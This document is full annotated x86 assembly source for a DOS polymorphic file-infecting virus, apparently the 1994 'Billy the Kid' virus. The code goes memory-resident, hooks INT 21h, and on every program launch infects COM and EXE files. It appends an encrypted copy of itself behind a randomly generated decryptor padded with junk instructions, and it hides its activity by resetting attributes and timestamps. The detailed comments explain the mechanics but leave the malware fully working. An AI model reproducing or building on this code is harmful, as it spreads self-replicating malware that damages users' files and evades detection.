; Stack segment of the dummy first-generation host (64 * 8 = 512 bytes).
; The assume only steers the assembler's operand checking; the first-
; generation .EXE gets its real SS:SP from the linker via this 'stack' segment.
assume ss:codevir
pila segment stack 'stack'
db 64 dup ('12345678')
pila ends
; Dummy host used to build the first-generation sample: prints 'z' and exits
; with code 0. It is not the program entry point - `end start` (bottom of the
; file) makes `start` in codevir the entry, so the virus runs first and
; returns here through porfin's desdeexe path.
code segment
anfitrion:
assume cs:code, ds:code
mov ah, 02h ; DOS: write character in dl to stdout
mov dl, 'z'
int 21h
mov ax, 4C00h ; DOS: terminate, exit code 0
int 21h
code ends
codevir segment
assume cs:codevir, ds:codevir
; First-generation decryptor + loader stub. In infected files this segment is
; replaced by the decryptor that genpar emits from the tablasi template,
; which has the same shape (mov cx / mov si / two 3-byte ops / inc si / loop),
; followed by a copy of the comienzor stub.
start:
; cx = bytes covered by the loop: stub + whole porfin body (longi) + 16
mov cx, (offset fincomienzo)-(offset comienzo)+(longi)+16
mov si, offset comienzo ; resolved by the assembler
bucleen:
; Key 00h twice: a no-op in this generation. These are the same two 3-byte
; slots that the generated decryptor fills with clavd2/clavd1.
xor byte ptr cs:[si],00h
xor byte ptr cs:[si],00h
inc si
loop bucleen
;***comienzo***
comienzo:
; call/pop trick: ax = runtime offset of acanomas
call acanomas
acanomas label near
pop ax
add ax, offset fincomienzo - offset acanomas ; ax = offset just past the stub
test al, 0Fh ; round up to a 16-byte (paragraph) boundary
jz noinc
add ax, 0010h
noinc:
mov cl, 04h
shr ax, cl ; ax = stub length in paragraphs
mov cx, ax ; consumed by porfin at offset 0 (added to segcsm)
push cs
pop bx
add bx, cx ; bx = segment at which the porfin body sits at offset 0
xor ax, ax
push cs ; left on the stack for porfin (popped into es there)
push bx
push ax
retf ; far jump to bx:0000 (porfin, offset 0)
fincomienzo:
codevir ends
;***OFS0***
porfin segment
assume cs:porfin, ds:porfin
; Entry at offset 0 of this segment, reached through the stub's retf.
; On entry: cx = stub length in paragraphs; the stub's cs is on the stack;
; ds = PSP segment (DOS convention at program start), saved as segant.
; segcsm = distance in paragraphs from the host's load segment to this one.
add cs:[segcsm], cx
; Residency check: INT 21h AH=0DDh. The resident handler answers AX='LO'
; (see handler). The cmp result is carried in ZF down to the jnz below;
; the mov/push/pop in between do not touch flags.
mov ah, 0DDh
int 21h
cmp ax, 'LO'
mov cs:[segant], ds ; PSP segment
push cs ; ds = this segment
pop ds ; es = segment pushed by the stub
pop es ;
jnz noactivo ; not resident yet -> install
jmp correr ; already resident -> just run the host
noactivo:
push ds
push es
cld
; Save the first 16 bytes of the PSP (including the top-of-memory word at
; PSP+2) in bufpsp; activar adjusts that copy before it is written back.
mov ds, [segant]
push cs
pop es
mov cx, 0010h
xor si, si
mov di, offset bufpsp
rep movsb
pop es
pop ds
call activar ; go resident and hook INT 21h
push es
mov es, [segant]
mov cx, 0010h
xor di, di
mov si, offset bufpsp
rep movsb ; write the adjusted 16 bytes back over the PSP
pop es
correr:
; Hand control to the host. origen is 'C' for a .COM host, 'E' for an .EXE.
cmp byte ptr [origen], 'C'
jnz desdeexe
desdecom:
; .COM host: put the original 3 bytes back at es:0100h (es = the segment
; the stub ran in, i.e. the COM's load segment) and far-jump to PSP:0100h.
mov si, offset original ; the 3 original bytes of the host
mov di, 0100h
cld
movsw
movsb
mov ds, [segant]
push ds
mov ax, 0100h
push ax
retf ; to the start of the host
desdeexe:
; .EXE host: rebuild SS:SP and CS:IP from the header fields saved by crea,
; relocated by the load segment (bx = cs - segcsm). ds = es = PSP.
mov cx, [ofsexe]
mov bx, cs
sub bx, [segcsm]
mov ax, [segstk]
add ax, bx
cli
mov ss, ax
mov sp, [ofsstk]
sti
mov ax, [segexe]
add ax, bx
mov es, [segant]
mov ds, [segant]
push ax
push cx
retf ; to the host's original entry point
activar proc
; Go resident: free the host's own memory block, shrink it by tamres+1
; paragraphs, allocate a tamres-paragraph block for the body, mark that block
; as DOS-owned (recubre), copy the body there and take over INT 21h.
; In:  [segant] = PSP segment; ds = cs = this segment
; Out: resident copy installed; int21ip/int21cs hold the old vector (stored
;      in the resident copy, not in this one); bufpsp+2 = new top of memory
; None of the DOS calls below has its carry flag checked.
cli
push es
mov es, [segant]
mov ah, 49h ; DOS: free memory block at es (the program's PSP block)
int 21h
mov ah, 48h ; DOS: allocate 0FFFFh paragraphs - fails, bx = largest free size
mov bx, 0FFFFh
int 21h
sub bx, tamres+1
mov ah, 4Ah ; DOS: resize block at es to (largest - tamres - 1) paragraphs
int 21h
mov ax, es
add ax, bx
mov word ptr cs:[bufpsp + 0002h], ax ; new top-of-memory for the PSP copy
mov ah, 48h ; DOS: allocate tamres (100h) paragraphs for the resident copy
mov bx, tamres
int 21h
mov es, ax
call recubre ; set the block's MCB owner to 0008h
copiamem:
xor si, si
mov di, si
mov cx, longi ; whole porfin body
cld
rep movsb
push es
pop ds ; ds = resident copy; the stores below land there
mov ax, 3521h ; DOS: get INT 21h vector -> es:bx
int 21h
mov [int21cs], es
mov [int21ip], bx
mov dx, offset handler
call setintvec ; al is still 21h: IVT[21h] = ds:dx (resident handler)
push cs
pop ds
noalcanza: ; no visible jump targets this label
pop es
sti
ret
activar endp
recubre proc
; Re-tag the memory block at es. The MCB one paragraph below es keeps the
; owner PSP segment in the word at offset 1; 0008h is the value DOS uses for
; its own blocks, so DOS treats the block as a system block rather than as
; belonging to the exiting program. Preserves ax and es.
push ax
mov ax, es
dec ax
mov es, ax ; es = the block's MCB
mov word ptr es:[0001h], 0008h
mov ax, es
inc ax
mov es, ax
pop ax
ret
recubre endp
setintvec proc
; Write an interrupt vector straight into the IVT (no DOS AH=25h call).
; In:  al = interrupt number; ds:dx = handler (far pointer)
; Out: IVT[al] = ds:dx. Preserves ax, bx, es and flags.
pushf
push ax
push bx
push es
cli ; no interrupt may fire between the two half-writes
xor bh, bh
mov bl, al
shl bx, 01h ; bx = al * 4 (two 1-bit shifts: 8086-encodable form)
shl bx, 01h
xor ax, ax
mov es, ax ; es = 0000h -> IVT
mov es:[bx], dx ; offset
mov es:[bx+02h],ds ; segment
pop es
pop bx
pop ax
popf
ret
setintvec endp
handler proc
; Resident INT 21h hook.
;  AH=0DDh -> residency signature: answer AX='LO' and return (iret).
;  AH=4Bh  -> EXEC: run fexec on the program about to be loaded, then chain.
;  anything else -> chain to the original vector (int21ip/int21cs are
;  adjacent words and are read here as one far pointer).
cmp ah, 0DDh
jne vamo
mov ax, 'LO'
iret
vamo:
cmp ah, 4Bh
je fexec
finfexec:
jmp dword ptr cs:[int21ip]
handler endp
fexec proc
; INT 21h AH=4Bh (EXEC) path. ds:dx = path of the program about to run.
; Sequence: allocate a 100h-paragraph work buffer; install a silent INT 24h
; (critical error) handler; clear the file's attributes; open it read/write;
; read its first 4 bytes; skip it when its timestamp carries the infection
; marker (seconds field == 5); pad it to a paragraph (alineafile); build the
; image (crea) and append it; patch the entry point (COM: 3-byte jmp; EXE:
; header already rewritten by crea); set the marker timestamp; then restore
; attributes and INT 24h, free the buffer and chain to the original INT 21h.
; Every DOS call is made with pushf + far call to the saved original vector.
; All general registers plus ds/es are saved on entry and restored at memoerror.
cld
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov ah, 48h ; DOS: allocate 100h paragraphs (work buffer)
mov bx, 0100h
pushf
call dword ptr cs:[int21ip]
jc memoerror1
mov es, ax ; es = work buffer
push es
push ds
push dx
mov ax, 3524h ; DOS: get INT 24h (critical error) vector -> es:bx
pushf
call dword ptr cs:[int21ip]
mov cs:[int24ip], bx
mov cs:[int24cs], es
mov dx, offset hand24 ; hand24 answers "ignore" to every critical error
push cs
pop ds
call setintvec ; relies on al still being 24h from the 3524h call
pop dx
pop ds
pop es
call getattr ; save the file's attributes, then clear them
mov ax, 3D02h ; DOS: open ds:dx read/write
pushf
call dword ptr cs:[int21ip]
jc openerror1
push ds
push dx
mov bx, ax
mov cs:[fhandle], ax
mov ah, 3Fh ; DOS: read 4 bytes into `original`
mov cx, 0004h
push cs
pop ds
mov dx, offset original ; the `original` slot is unused at this point
pushf
call dword ptr cs:[int21ip]
pop dx
pop ds
jc readerror1
push dx
mov ax, 5700h ; DOS: get file date/time -> dx:cx
pushf
call dword ptr cs:[int21ip]
mov cs:[fhora], cx
mov cs:[ffecha],dx
pop dx
; Infection marker: low 3 bits of the time word (2-second field) == 5.
and cl, 00000111b
cmp cl, 00000101b
jz readerror1 ; already infected
push ds
push dx
; bp = host type: 0 = EXE ('MZ' signature), 1 = COM (anything else).
xor bp, bp
cmp cs:[original],'ZM'
jz dale ; 'MZ' header -> EXE path with bp = 0
inc bp
jmp dale ; otherwise treated as a COM, bp = 1
openerror1: ; trampolines: the conditional jumps above are short and cannot
jmp openerror ; reach the cleanup labels at the end of the routine
memoerror1: ;
jmp memoerror ;
readerror1: ;
jmp readerror ;
writeerror1: ;
jmp writeerror ;
dale:
push cs
pop ds
mov [origen],'C' ; record the host type inside the image that gets written
or bp, bp
jnz escom1
mov [origen],'E'
escom1:
call alineafile ; pad to a paragraph; dx:ax = new file length
cmp dl, 08h
ja writeerror1 ; dx > 8, i.e. length >= 90000h bytes (576 KiB): skip
push ax
push dx
mov cs:[longhi], dx
mov cs:[longlo], ax
call crea ; build the image at es:0000; di = its length; cf = skip
jnc bien
pop ds ; rebalance the stack; the two popped values are not used
pop ax
jmp writeerror
bien:
mov bx, [fhandle]
push es
pop ds ; ds = work buffer
pop dx ; dx = longhi
pop ax ; ax = longlo
push ax
add ax, 0100h ; ax = length + 100h = load offset of the image in a COM
mov si, cs:[ddespl] ; si -> the `mov si, imm16` of the generated decryptor
or bp, bp
jz esexe2
add [si+01h], ax ; COM only: relocate the decryptor's start pointer
esexe2:
mov cx, di
mov ah, 40h ; DOS: write the whole image (cx = di bytes) at end of file
xor dx, dx
pushf
call dword ptr cs:[int21ip]
pop dx ; dx = longlo
jc writeerror
cmp ax, cx
jb writeerror ; short write
push cs
pop ds
sub dx, 0003h ; jmp rel16 at offset 100h: target = 100h + length (the image)
mov [dsalto], dx
mov ax, 4200h ; DOS: seek to offset 0
xor cx, cx
mov dx, cx
pushf
call dword ptr cs:[int21ip]
or bp, bp
jz esexe3
mov ah, 40h ; COM only: overwrite the first 3 bytes with `jmp` (cambiazo/dsalto)
mov cx, 0003h
mov dx, offset cambiazo
pushf
call dword ptr cs:[int21ip]
jc writeerror
esexe3:
; Put the original date/time back with the seconds field forced to 5
; (the marker tested above).
mov dx,[ffecha]
mov cx,[fhora]
and cl, 11111000b
or cl, 00000101b
mov ax, 5701h ; DOS: set file date/time
pushf
call dword ptr cs:[int21ip]
writeerror:
pop dx
pop ds
readerror:
mov ah, 3Eh ; DOS: close the handle in bx
pushf
call dword ptr cs:[int21ip]
openerror:
call setattr ; restore the original attributes (ds:dx = path again here)
mov dx, [int24ip] ; NOTE: read relative to ds, which at this point holds the
mov ds, [int24cs] ; caller's (path) segment, not cs
mov al, 24h
call setintvec
mov ah, 49h ; DOS: free the work buffer (es)
pushf
call dword ptr cs:[int21ip]
memoerror:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp finfexeC ; chain to the original INT 21h so the EXEC itself proceeds
fexec endp
alineafile proc
; Pad the open file (handle in bx) up to a 16-byte boundary.
; Out: dx:ax = new file length; [agregado] = number of filler bytes (0..15).
; The filler comes from ds:dx, where dx still holds the high word of the
; length returned by the first seek (0 for a file under 64 KiB), so its
; content is incidental. The write's carry flag is not checked.
xor cx, cx
mov dx, cx
mov ax, 4202h ; DOS: seek to end -> dx:ax = current length
pushf
call dword ptr cs:[int21ip]
mov cx, ax
neg cl
and cx, 000Fh ; cx = (16 - len mod 16) mod 16
mov cs:[agregado], cx
mov ah, 40h ; DOS: write cx filler bytes from ds:dx
pushf
call dword ptr cs:[int21ip]
mov ax, 4202h ; DOS: seek to end again -> dx:ax = padded length
xor cx, cx
mov dx, cx
pushf
call dword ptr cs:[int21ip]
ret
alineafile endp
getattr proc
; Save the attributes of the file at ds:dx in [fattr], then clear them all
; (read-only/hidden/system would otherwise block the read/write open).
mov ax, 4300h ; DOS: get file attributes -> cx
pushf
call dword ptr cs:[int21ip]
mov cs:[fattr], cx
mov ax, 4301h ; DOS: set file attributes = 0
xor cx, cx
pushf
call dword ptr cs:[int21ip]
ret
getattr endp
setattr proc
; Restore the attributes saved by getattr on the file at ds:dx.
mov ax,4301h ; DOS: set file attributes = [fattr]
mov cx, cs:[fattr]
pushf
call dword ptr cs:[int21ip]
ret
setattr endp
hand24 proc
; Temporary INT 24h (critical error) handler: al = 0 tells DOS to ignore the
; error, so no "Abort, Retry, ..." prompt appears while the target file is
; being modified. Installed and removed by fexec.
xor al, al
iret
hand24 endp
crea proc
; Build the infected image in the work buffer.
; In:  es = buffer segment (image built at es:0000); ds = this code segment
;      bx = file handle; bp = 0 EXE / 1 COM
;      [longlo]:[longhi] = padded file length; [agregado] = padding added
; Out: di = image length; cf = 0 ok, cf = 1 leave this file alone
; Image layout: [generated decryptor][comienzor stub][pad to 16][encrypted
; body = stub..finporfin]. For an EXE the 1Ch-byte header is also rewritten
; on disk so that the entry point becomes the decryptor.
xor di, di
push bx
call genpar ; emit the polymorphic decryptor at es:0000; di = its length
pop bx
push di ; remember where the encrypted region starts
mov cx, offset fincomienzor-offset comienzor
mov si, offset comienzor
rep movsb ; append the loader stub
alinea:
test di, 000Fh ; round di up to a paragraph boundary
jz yalineado
inc di
jmp alinea
yalineado:
or bp, bp
jnz escom41 ; COM: no header work
push ds
push es
pop ds ; ds = buffer
xor cx, cx
mov dx, cx
mov ax, 4200h ; DOS: seek to offset 0
pushf
call dword ptr cs:[int21ip]
mov ah, 3Fh ; DOS: read the 1Ch-byte EXE header into scratch space beyond
mov cx, 001Ch ; the end of the image (di + offset finporfin)
lea dx, [di+offset finporfin]
mov si, dx ; si -> header copy
pushf
call dword ptr cs:[int21ip]
jc puchaaaa1
; Consistency check: the header's page count ([si+4]) and bytes-in-last-page
; ([si+2]) must match the file size before padding. A mismatch (overlay or
; non-standard layout) makes the routine give up on the file.
mov ax, cs:[longlo] ;
mov dx, cs:[longhi] ;
sub ax, cs:[agregado] ;
sbb dx, 0000h ;
mov cx, 0200h ;
div cx ; ax = 512-byte pages, dx = remainder
or dx, dx ;
jz nomas2 ;
inc ax ; round pages up
nomas2: ;
cmp dx, [si+02h] ;
jne puchaaaa1 ;
cmp ax, [si+04h] ;
jne puchaaaa1 ;
; Keep the header fields the loader (desdeexe) needs to start the host.
mov ax, [si+08h] ; header size in paragraphs
mov cs:[shead], ax
mov ax, [si+0Ah] ; minalloc (saved; not otherwise used in visible code)
mov cs:[minimo], ax
mov ax, [si+10h] ; initial SP
mov cs:[ofsstk], ax
mov ax, [si+0Eh] ; initial SS
mov cs:[segstk], ax
mov ax, [si+14h] ; initial IP
mov cs:[ofsexe], ax
mov ax, [si+16h] ; initial CS
mov cs:[segexe], ax
push bx
jmp fsdf
puchaaaa1: ; trampolines for the short conditional jumps above
jmp puchaaaa
escom41:
jmp escom4
fsdf:
; New file size = padded length + image (di + body); update [si+2]/[si+4].
mov ax, cs:[longlo]
mov dx, cs:[longhi]
push ax
push dx
add ax, offset finporfin
adc dx, 0000h
add ax, di
adc dx, 0000h
mov cx, 0200h
div cx
or dx, dx
jz nomas1
inc ax
nomas1:
mov [si+02h], dx
mov [si+04h], ax
mov cs:[fsize], ax
pop dx
pop ax
; ax = padded length / 16: low word shifted right 4, low nibble of the high
; word shifted into the top 4 bits.
mov bx, dx
mov cl, 04h
shr ax, cl
shr dx, cl
mov cl, 0Ch
and bx, 000Fh
shl bx, cl
or ax, bx
pop bx
sub ax, [si+08h] ; minus header paragraphs = image segment relative to load seg
mov [si+16h], ax ; new initial CS -> the decryptor at offset 0
mov cs:[segcsm], ax
dec ax
mov [si+0Eh], ax ; new SS = CS - 1
lea ax, [di+offset finporfin+00FFh]
mov [si+10h], ax ; new SP just past the body
mov word ptr [si+14h], 0000h ; new IP = 0
mov ax, 4200h ; DOS: seek to offset 0
xor cx, cx
mov dx, cx
pushf
call dword ptr cs:[int21ip]
mov ah, 40h ; DOS: write the modified header back
mov cx, 001Ch
mov dx, si
pushf
call dword ptr cs:[int21ip]
jc puchaaaa
pop ds
escom4:
; Append the body (offset 0 .. finporfin of this segment) after the stub.
xor si, si
mov cx, offset finporfin
rep movsb
mov ax, di ; ax = image end
pop di ; di = start of the encrypted region (decryptor length)
push ax
sub ax, di ; ax = region length
mov cx, ax
dec ax
dec ax
mov si, di
mov di, [dlongit] ; di -> the decryptor's `mov cx, imm16`
mov es:[di+01h], ax ; loop count = region length - 2
pop di
push ds
push es
pop ds
call encript ; encrypt ds:si .. +cx in place with the keys genpar chose
pop ds
mov ax, 4202h ; DOS: seek to end (fexec writes the image there)
xor cx, cx
mov dx, cx
pushf
call dword ptr cs:[int21ip]
clc
ret
puchaaaa:
pop ds
pop di
stc
ret
crea endp
;*******************COMIENZO DE RUTINAS PMORFICAS******************
rand proc near
; Pseudo-random word with no fixed seed: walks memory using its previous
; output ([segale]:[ofsale]) and the BIOS tick counter at 0000:046Ch as
; indices and returns a mix of what it reads there.
; Out: ax = value. Preserves bx, ds, es. State: segale, ofsale.
push ds
push es
push bx
xor ax, ax
mov es, ax ; es = 0000h (IVT / BIOS data area)
mov ax, cs:[segale]
cmp ax, 61440 ; keep the sampled segment below F000h
jb menor
mov ax, 61339
menor:
mov ds, ax
mov bx, cs:[ofsale]
mov ax, [bx]
mov cs:[segale], ax ; next segment = word found at the current position
mov bx, es:[046Ch] ; BIOS timer tick count (40h:6Ch), low word
mov ax, [bx]
add bx, ax
mov cs:[ofsale], bx ; next offset = tick + word found at [tick]
mov ax, [bx+10]
xor ax, bx
pop bx
pop es
pop ds
ret
rand endp
encript proc near
; Encrypt cx bytes at ds:si in place. The two instructions at clave1/clave2
; are written as raw bytes because genpar/fillclv rewrite them at runtime:
; byte 1 (ModRM) selects the operation (see tencri), byte 2 is the key.
; In:  ds:si = start, cx = length. Preserves si.
push si
bucle:
clave1 label byte
db 80h, 34h, 0FFh ; xor byte ptr [si],0FFh - op and key patched at runtime
clave2 label byte
db 80h, 04h, 0FFh ; add byte ptr [si],0FFh - op and key patched at runtime
inc si
loop bucle
pop si
ret
encript endp
fillclv proc near
; Pick a random operation for one encryptor slot and install it in encript,
; with its inverse in the decryptor template (tablasi).
; In:  dh = slot: 0 selects clave2/clavd2, nonzero selects clave1/clavd1
;      ds = this code segment
; tencri[0..3] = encrypt ModRM, tencri[4..7] = matching inverse.
xor bh, bh
call rand
mov bl, al
and bl, 03h ; 03h = 00000011b -> index 0..3
mov al, 80h ; opcode 80h /r: byte operation with imm8
mov ah, offset tencri[bx] ; ah = ModRM selecting add/sub/xor on [si]
or dh, dh
jz sc2
mov word ptr ds:[offset clave1], ax ; encryptor side (encript)
mov ah, offset tencri[bx+4]
mov word ptr ds:[offset clavd1], ax ; decryptor side (template)
jmp short finfillclv
sc2:
mov word ptr ds:[offset clave2], ax
mov ah, offset tencri[bx+4]
mov word ptr ds:[offset clavd2], ax
finfillclv:
ret
fillclv endp
pone proc near
; Emit one piece of the decryptor at es:di.
; In:  ah = mode: 0 = one or two junk instructions from tablano,
;      1 = the next real template piece from tablasi (index 10 - cx)
;      cx = genpar's loop counter (10 down to 1); ds = this code segment
; Side effects (ah = 1): records the output offset of the pieces later
; fix-ups need: dlongit (mov cx), ddespl (mov si), dirbucle (first loop
; body instruction), dirfbucle (the loop instruction). Advances di.
push cx
or ah, ah
jz noutil
xor dh, dh
mov dl, 0Ah
sub dl, cl ; dl = piece index 0..9
cmp dl, 03h
jz estres
cmp dl, 04h
jz escuatro
cmp dl, 05h
jz esdos
cmp dl, 08h
jz esocho
jmp listo
esdos:
mov [dirbucle], di ; piece 5: first instruction of the loop body (clavd2)
jmp listo
estres:
mov [dlongit], di ; piece 3: mov cx, <length>
jmp listo
escuatro:
mov [ddespl], di ; piece 4: mov si, <start>
jmp listo
esocho:
mov [dirfbucle], di ; piece 8: loop <rel8>
listo:
mov cx, offset tablas ; (offset, length) pairs
mov bx, offset tablasi ; template bytes
call lopone
jmp short finpone
noutil:
; Junk: 1 or 2 instructions; the count comes from the system date/time,
; each instruction from rand.
push cx
mov ah, 2Ah ; DOS: get system date -> dx
pushf
call dword ptr cs:[int21ip]
mov si, dx
mov ah, 2Ch ; DOS: get system time -> cx:dx
pushf
call dword ptr cs:[int21ip]
xor si, dx
and si, 0001h ; keep the low bit only
inc si ; si = 1 or 2
mov cx, si
bucle2:
push cx
call rand
xor dh, dh
mov dl, al
and dl, 07h ; 07h = 00000111b -> index 0..7 into tablln
mov cx, offset tablln
mov bx, offset tablano
call lopone
pop cx
loop bucle2
pop cx
finpone:
pop cx
ret
proc lopone
; Copy entry dl of the (offset, length) table at ds:cx - the bytes it names
; in the table at ds:bx - to es:di. Advances di; clobbers ax, cx, dx, si.
shl dl, 1 ; 2 bytes per entry
add dx, cx
push bx
mov bx, dx
mov ax, [bx] ; al = offset into the bx table, ah = length
pop bx
mov cl, ah
xor ch, ch
mov si, bx
xor ah, ah
add si, ax
cld
rep movsb
ret
lopone endp
pone endp
genpar proc near
; Generate the polymorphic decryptor at es:di and set the matching keys and
; operations in encript.
; In:  es:di = output (di = 0 when called from crea); ds = this code segment
; Out: di = decryptor length (= offset of the encrypted region); the tablasi
;      template and encript's two instructions are patched in place.
; Shape: 10 template pieces (tablasi), each preceded by 1-2 junk instructions
; (tablano); the loop displacement and the start pointer are fixed up last.
push ds
push es
push cs
pop ds
call rand
mov ds:[offset clavd2+2], ah ;
mov ds:[offset clave2+2], ah ; key bytes: ah for slot 2, al for slot 1,
mov ds:[offset clavd1+2], al ; stored in both the encryptor (clave*)
mov ds:[offset clave1+2], al ; and the decryptor template (clavd*)
xor dh, dh
call fillclv ; random operation for slot 2
inc dh
call fillclv ; random operation for slot 1
mov cx, 000Ah
pop es
bucle1:
xor ah, ah
call pone ; junk
inc ah
call pone ; template piece (10 - cx)
loop bucle1
push di
; Fix up `loop`: rel8 = -(address after the loop instruction - dirbucle)
mov di, [dirfbucle]
inc di ; di -> the rel8 byte
mov ax, di
inc ax ; ax = address after the loop instruction
sub ax, [dirbucle]
neg ax
stosb
; Fix up `mov si, imm16`: encrypted region starts right after the decryptor
mov di, [ddespl]
pop ax
mov es:[di+01h], ax
mov di, ax
pop ds
ret
genpar endp
;************************TABLA DE ENCRIPTORES******************
; ModRM bytes for opcode 80h with an [si] operand. Entries 0..3 are the
; encrypting operations, entries 4..7 the inverse at the same index:
; 04h = add, 2Ch = sub, 34h = xor (xor is its own inverse).
tencri label byte
db 04h
db 2Ch
db 34h
db 34h
db 2Ch
db 04h
db 34h
db 34h
;************************FIN TABLA ENCRIPTORES******************
;****************************TABLA UTIL***************************
; Piece table for the decryptor template: one (offset, length) byte pair per
; piece, indexing into tablasi. Used by pone with ah = 1.
tablas db 00, 01, 01, 01, 02, 01, 03, 03, 06, 03, 09, 03, 12, 03, 15, 01
db 16, 02, 18, 01
tablasi label byte
; Decryptor template - the code an infected file starts with. It undoes
; clave2 first, then clave1: the reverse order of encript.
db 1Eh ; push ds
db 0Eh ; push cs
db 1Fh ; pop ds
db 0B9h ; mov cx, <length to decrypt>
dlongit dw ? ; doubles as a variable: output offset of this piece (pone); the imm16 is patched in the output by crea
db 0BEh ; mov si, <start of encrypted region>
ddespl dw ? ; likewise: output offset of this piece (pone); patched in the output by genpar/fexec
clavd2 db 3 DUP (?) ; op byte ptr [si], key - inverse of clave2 (fillclv/genpar)
clavd1 db 3 DUP (?) ; op byte ptr [si], key - inverse of clave1 (fillclv/genpar)
db 46h ; inc si
db 0E2h ; loop <rel8>
salto db ? ; rel8, fixed up in the output by genpar
db 1Fh ; pop ds
;******************************FIN TABLA UTIL************************
;****************************TABLA INUTIL***************************
; Junk table: (offset, length) pairs into tablano. Used by pone with ah = 0.
tablln DB 00, 01, 01, 03, 04, 03, 07, 01, 08, 01, 09, 04, 13, 05, 18, 01
tablano label byte
; Filler instructions with no effect on the decryptor's result:
db 90h ; nop
db 25h, 0FFh, 0FFh ; and ax, 0FFFFh
db 0Dh, 00h, 00h ; or ax, 0000h
db 0F8h ; clc
db 0F9h ; stc
db 81h, 0C9h, 00h, 00h ; or cx, 0000h
db 80h, 06h, 34h, 12h, 00h ; add byte ptr [1234h], 00h (rewrites ds:1234h with itself)
db 0FCh ; cld
;***********************FIN TABLA INUTIL**************************
;****************************VARIABLES***************************
dirbucle dw ? ; output offset of the first loop-body instruction (set by pone)
dirfbucle dw ? ; output offset of the `loop` instruction (set by pone)
segale dw ? ; rand state: last sampled segment
ofsale dw ? ; rand state: last sampled offset
;*****************************FIN DE RUTINAS PMORFICAS****************
;Repetición, pero en el otro segmento para que quede residente
comienzor:
; Loader stub that crea copies into infected files right after the generated
; decryptor; functionally the same as comienzo in codevir. It computes its
; own paragraph-aligned end, leaves cs on the stack and far-jumps to the
; porfin body at (cs + stub paragraphs):0000 with cx = that paragraph count.
call acanomasr
acanomasr label near
pop ax ; ax = runtime offset of acanomasr
add ax, offset fincomienzor - offset acanomasr ; ax = offset just past the stub
test al, 0Fh
jz noincr
add ax, 0010h ; round up to a paragraph
noincr:
mov cl, 04h
shr ax, cl
mov cx, ax ; paragraphs, consumed at porfin offset 0
push cs
pop bx
add bx, ax ; bx = segment of the body
xor ax, ax
push cs ; previous segment, popped into es by porfin
push bx
push ax
retf ; far jump to bx:0000
fincomienzor:
;*****************************VARIABLES*******************************
longi = offset finporfin ; body size: everything copied resident and appended to hosts
tamres = 0100h ; resident block size in paragraphs (4 KiB)
segant dw ? ; PSP segment of the current host
origen db 'E' ; host type stored in the image: 'E' = EXE, 'C' = COM
bufpsp db 10h dup(?) ; copy of the first 16 bytes of the PSP (activar edits +2)
original label word ; the host's first 4 bytes are read here (aliases segexe/ofsexe)
segexe dw 32 ; EXE: host initial CS (relative). The initial values of this
ofsexe dw 0 ; group describe the first-generation build and are overwritten
segcsm dw 33 ; by crea/porfin on infection. segcsm = paragraphs from the
segstk dw 0 ; load segment to the body's segment; segstk = host initial SS
ofsstk dw 0200h ; EXE: host initial SP
fsize dw 3 ; EXE: page count written to the header by crea (not read elsewhere in visible code)
shead dw 32 ; EXE: header size in paragraphs (saved by crea)
minimo dw 1 ; EXE: minalloc (saved by crea; not otherwise used in visible code)
fhandle dw ? ; handle of the file being processed
fhora dw ? ; its original time word
ffecha dw ? ; its original date word
fattr dw ? ; its original attributes
tapon db 'COMMAND' ; not referenced by any visible code
cambiazo db 0E9h ; jmp rel16 opcode ...
dsalto DW ? ; ... and displacement: the 3 bytes written over a COM's start
longlo dw ? ; padded host length, low word
longhi dw ? ; padded host length, high word
int21ip dw ? ; original INT 21h vector (ip, then cs: read as one far pointer)
int21cs dw ?
int24ip dw ? ; original INT 24h vector
int24cs dw ?
agregado dw ? ; number of padding bytes added by alineafile
; Author's text, left commented out (never assembled into the body):
; db ' (C)1994 S.A.O. Texas. Billy the Kid Virus.'
; db ' Look out boy! This is the only far west virus that will make'
; db ' you cry for being born.'
; db ' P.S. : Listen Led Zeppelin and AC/DC with your sons and God'
; db ' will bless ya. '
; db ' Leave Castro alone.'
; db ' Superman... Why don't you fuck Luisa????'
; db " That's not a fuckin grafitti, it's a sign."
; db 'Jeroboam y todo el pueblo volvieron a ver a Rehoboam al tercer '
; db 'dia como lo ordeno el rey.'
; db 'I hate moscas.'
; db 'Hecho en China...no piensen que se hizo aca en Argentina.'
finporfin label byte ; end of the body: offset 0 .. here is what travels with each host
porfin ends
end start ; first-generation entry point: `start` in codevir